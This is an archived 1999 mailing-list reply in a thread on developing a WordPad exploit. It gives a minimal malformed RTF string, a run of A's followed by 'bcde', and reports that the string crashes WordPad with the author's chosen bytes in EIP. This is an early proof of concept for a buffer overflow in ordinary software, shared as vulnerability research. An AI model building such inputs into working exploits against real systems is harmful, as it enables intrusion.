Vulnerability Development mailing list archives

Re: development of wordpad exploit

From: dlh () ACU CS UMB EDU (Dave Harvill)
Date: Sun, 21 Nov 1999 00:07:54 -0500


On Sat, 20 Nov 1999, Thomas Dullien wrote:

<snip>


For this reason, we first use wordpad to create a simple rtf file, containing any
text you wish. Mine looks like this when viewed in notepad:

;--- snip ;>----------
{\rtf1\ansi\deff0\deftab720{\fonttbl{\f0\fswiss MS Sans Serif;}{\f1\froman\fcharset2 Symbol;}{\f2\froman Times New 
Roman;}}
{\colortbl\red0\green0\blue0;}
\deflang1031\pard\plain\f2\fs20 HOLA :)
\par }
;--- snap ;>-----------

</snip>

if you're looking for simplicity, I managed with the following:

{rtf\AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAbcde}

and got 0x45444342 in EIP after crash. Found this to be  minimum to get
bcde in EIP

-dave

~~~~~~~~~~~~~~~~~~~~~~
dlh () acu cs umb edu
http://www.cs.umb.edu
~~~~~~~~~~~~~~~~~~~~~~

Current thread:

Re: development of wordpad exploit, (continued)
- Re: development of wordpad exploit Thomas Dullien (Nov 19)
- Re: development of wordpad exploit Harlan Carvey (Nov 19)
- Re: development of wordpad exploit Vanna P. Rella (Nov 19)
  - Re: development of wordpad exploit Witold Chrabaszcz (Nov 19)
    - Re: development of wordpad exploit Blue Boar (Nov 19)
    - Re: development of wordpad exploit Rodrick Brown (Nov 19)
    - [Fwd: INZIDER!] Blue Boar (Nov 19)
    - Re: development of wordpad exploit Seth R Arnold (Nov 20)
- Re: development of wordpad exploit Aubrey Smith (Nov 20)
- Re: development of wordpad exploit Thomas Dullien (Nov 20)
  - Re: development of wordpad exploit Dave Harvill (Nov 20)
- Re: development of wordpad exploit Pauli Ojanpera (Nov 21)
- Re: development of wordpad exploit Thomas Dullien (Nov 22)